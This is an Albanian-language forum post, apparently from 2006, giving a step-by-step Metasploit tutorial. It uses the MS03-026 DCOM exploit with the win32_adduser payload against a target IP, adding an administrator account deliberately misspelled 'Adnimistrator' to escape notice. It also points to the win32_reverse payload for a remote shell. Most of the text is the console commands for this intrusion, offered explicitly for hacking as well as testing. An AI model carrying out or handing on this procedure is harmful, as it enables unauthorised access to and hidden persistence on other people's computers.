Tung njerzi.
Zdi a keni ni per programin (aplikacionin) e quajtur Metasploit Framework.
Ky osht njeri prej progsave me te mire nese doni me hack ose me testu rrjetin e juaj duke perdorur exploitat ma te ri.
Kryesisht perdorja e nje exploit me metasploit bahet ne kta hapa:
I) E zgjedh exploitin
II) E zgjedh payloadin ("municionin")
III) Ja jep opcionet
IV) E ekzekuton
---------
Ne vazhdim po munohn ame ju spjegu pak se qysh perdoret:
1. Shkarkoni dhe instaloni programin prej http://www.metasploit.org/projects/Framework/downloads.html
Zgjedhni cilin verzion po e doni, dhe per cfar platforme Unix (Linux) ose Windows
2.Masi ta instaloni, startoni programin.
Shkoni te folderi ku e keni programin dhe klikoni ne msfconsole
http://img116.imageshack.us/img116/5691/startimi5bu.jpg
3.I kshyr qfar exploit ki ne dispozicion me komanden show exploits , edhe e zgjedh ate qi po e don. Ne rastin tone une po e perdori msrpc_dcom_ms03_026
3.a) E ve ne perdorim qat exploit me komanden use msrpc_dcom_ms03_026
4. Tash duhet me zgjedh municionin e ketij exploit.
Kshyrum qfar municioni kena me komanden show payloads
Ne rastin tone une po e perdori win32_adduser .
Per secilin exploit edhe payload e keni nje pershkrim te vogel ne te djathte, ne rastin tone win32_adduser ekzekuton komanden net user /ADD ne kompjuterin cilin e sulmojm.
Zgjedhja e municionit (payload) behet me komanden set PAYLOAD win32_adduser
5. Tash e perdorim komanden show options , per me kshyr se cilet opcione duhet me ja vnu na para se me perdor exploit.
http://img157.imageshack.us/img157/2308/pergatitja6kl.jpg
Te kolona Name e keni emrin e Opcionit cilit duhet te vendoset,
Kolona Default tregon nese ai opcion ka vlere te paracaktuar, nese eshte zbrazet ather duhet me ja vendos nje
Kurse Kolona Exploit: Tregon nese ai opcion eshte i nevojshem apo jo.
Kolona Description permban nje pershkrim te vogel per ate opcion
6. Tash po ja ndreqim opcionet:
Po e shohim opcioni RHOST nuk ka vlere te paracaktuar, dhe eshte e nevojshme, pra duhet me ja vendos na vete vlerat:
Prej kolones description po e shofim qe RHOST qenka adresa cilen po dojm me sulmu, ne rastin tone 10.10.15.1
po ja dhame vleren:
set RHOST 10.10.15.1
Njojt veprojm e dhe me opcionet tjera:
set PASS 123456 - Passwordi per shfrytezuesin e ri
set USER Adnimistrator - emri i shfrytezuesit (me qellim osht Adnimistrator qe me kan sa ma shtir mu dallu prej Administrator ;) )
Vini re: Opcionet dallojn prej Epxploitit ne exploit dhe prej payloadit ne payload.
http://img50.imageshack.us/img50/8325/opcionet2kq.jpg
7. Tash krejt qka ka met mu ba osht me ekzekutu exploit me komanden:
exploit
Nese e merrni kete mesazh:
http://img117.imageshack.us/img117/3997/patched2mf.jpg
Dmth qe caku osht i mbrojtur nga ky lloj i sulmit.
Fund.
Tash te keni nje shfrytezues ne cakun e juaj me emrin Adnimistrator edhe me pass:123456
Provone payloadin: win32_reverse nese doni me marr nje shell (cmd) me Dministrator account ne cakun e juaj, veq mos harroni me ja ndreq opcionet.
Liqe:
http://www.datastronghold.com/articles/1.html
http://www.nwcet.org/downloads/Metasploit_Penetration.pdf
Mos harroni me marr exploit te ri prej http://www.metasploit.org/projects/Framework/exploits.html 8:01 PM 4/28/2006